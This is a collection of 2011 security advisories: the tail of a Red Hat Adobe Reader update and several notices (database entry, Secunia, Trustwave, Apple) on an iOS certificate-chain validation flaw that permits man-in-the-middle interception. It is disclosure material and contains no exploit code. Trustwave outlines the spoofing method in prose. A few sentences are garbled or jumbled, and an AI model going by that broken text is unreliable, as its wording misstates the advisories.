available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0032 | CVE-2011-0228 | Apple iOS Updates for vulnerabilities in |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The Data Security component in Apple iOS before 4.2.10 and 4.3.x before 4.3.5 does not check the basicConstraints parameter during validation of X.509 certificate chains, which allows man-in-the-middle attackers to spoof an SSL server by using a non-CA certificate to sign a certificate for an arbitrary domain. Apple From iOS An update for has been released.By a third party SSL/TLS There is a possibility that the content being communicated on will be intercepted or tampered with. Apple iOS is prone to a security vulnerability that may allow attackers to capture or modify data.
Successful exploits will allow attackers to gain access to sensitive information or send misleading information to a victim user. Other attacks are also possible. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. ----------------------------------------------------------------------
The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way.
Read more and request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Apple iOS "basicConstraints" X.509 Certificate Chain Validation
Vulnerability
SECUNIA ADVISORY ID:
SA45369
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45369/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45369
RELEASE DATE:
2011-07-27
DISCUSS ADVISORY:
http://secunia.com/advisories/45369/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45369/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45369
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Apple iOS, which can be
exploited by malicious people to conduct spoofing attacks. This can be exploited to spoof certificates of arbitrary
domains and disclose encrypted information e.g. using a
Man-in-the-Middle (MitM) attack.
PROVIDED AND/OR DISCOVERED BY:
Paul Kehrer, Trustwave's SpiderLabs.
The vendor also credits Gregor Kopf, Recurity Labs on behalf of BSI.
ORIGINAL ADVISORY:
Apple:
http://support.apple.com/kb/HT4824
http://support.apple.com/kb/HT4825
Trustwave:
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-007:
iOS SSL Implementation Does Not Validate Certificate Chain
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt
Published: 2011-07-25
Version: 1.0
Vendor: Apple (http://www.apple.com)
Product: iOS
Version affected: Versions Prior to 5.0b4, 4.3.5, and 4.2.10
Product description:
iOS is Apple's mobile operating system for the iPhone, iPod Touch, and iPad
hardware platforms. By signing a new
certificate using a legitimate end entity certificate, an attacker can
obtain a "valid" certificate for any domain. For example:
-TrustedCA
--somedomain.com (legitimate certificate)
---api.someotherdomain.com (signed by somedomain.com)
Using this technique any SSL traffic using the api.someotherdomain.com
certificate can be intercepted and decrypted by the issuer. No notification
of the invalid nature of the certificate is presented to the iOS user.
This method allows for transparent man-in-the-middle attacks against
encrypted iOS communications.
Remediation Steps:
Users should update to the latest version of iOS in order to address this
issue. This vulnerability has been corrected in versions 5.0b4, 4.3.5, and
4.2.10.
Revision History:
07/15/11 - Vulnerability Disclosed
07/25/11 - Patch Released
07/25/11 - Advisory Published
References:
1. http://support.apple.com/kb/HT4824
2. http://support.apple.com/kb/HT4825
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2011-07-25-2 iOS 4.2.10 Software Update for iPhone
iOS 4.2.10 Software Update for iPhone is now available and addresses
the following:
Data Security
Available for: iOS 4.2.5 through 4.2.9 for iPhone 4 (CDMA)
Impact: An attacker with a privileged network position may capture
or modify data in sessions protected by SSL/TLS
Description: A certificate chain validation issue existed in the
handling of X.509 certificates. This issue is addressed through improved validation of
X.509 certificate chains.
CVE-ID
CVE-2011-0228 : Gregor Kopf of Recurity Labs on behalf of BSI, and
Paul Kehrer of Trustwave's SpiderLabs
Installation note:
This update is only available through iTunes, and will not appear
in your computer's Software Update application, or in the Apple
Downloads site. Make sure you have an Internet connection and have
installed the latest version of iTunes from www.apple.com/itunes/
iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When
the iPhone is docked, iTunes will present the user with the option
to install the update. We recommend applying the update immediately
if possible. Selecting Don't Install will present the option the
next time you connect your iPhone.
The automatic update process may take up to a week depending on the
day that iTunes checks for updates. You may manually obtain the
update via the Check for Updates button within iTunes. After doing
this, the update can be applied when your iPhone is docked to your
computer.
To check that the iPhone has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update will be
"4.2.10 (8E600)".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (Darwin)
iQEcBAEBAgAGBQJOKaO4AAoJEGnF2JsdZQeeZJAH/AgzQw32cHPdHMZMufmeTx7C
q0I1yzI+uF8HDERM8VfDg98rjVFbhcKKyeA1FNe1lGz79sIpo6Px4QubCRKyt2RW
FbLYNGlWNreNodBr8FhAQcVqYbHLogD1O/Y+MVeU9i4pVfO6gXFfaMHWZkaZDlZd
m9DLyPxAJ9uRtb9AYz3YL7Dp52YoW5yApSnpqV2dm5LE9L7ysvZ6inDOme0figAH
v8+MDE18x1Caw3n0f2cWd6Sz9jqjvIodgp8iYWMEYnsRUZtFlFyxbSQSJFeFq1Ul
y8N12gycPaWCJsqQyfFEruTcqHnV9kBVZV9TACT6UdtRkULXtsFEsqi6+8PI2mo=
=yzpz
-----END PGP SIGNATURE-----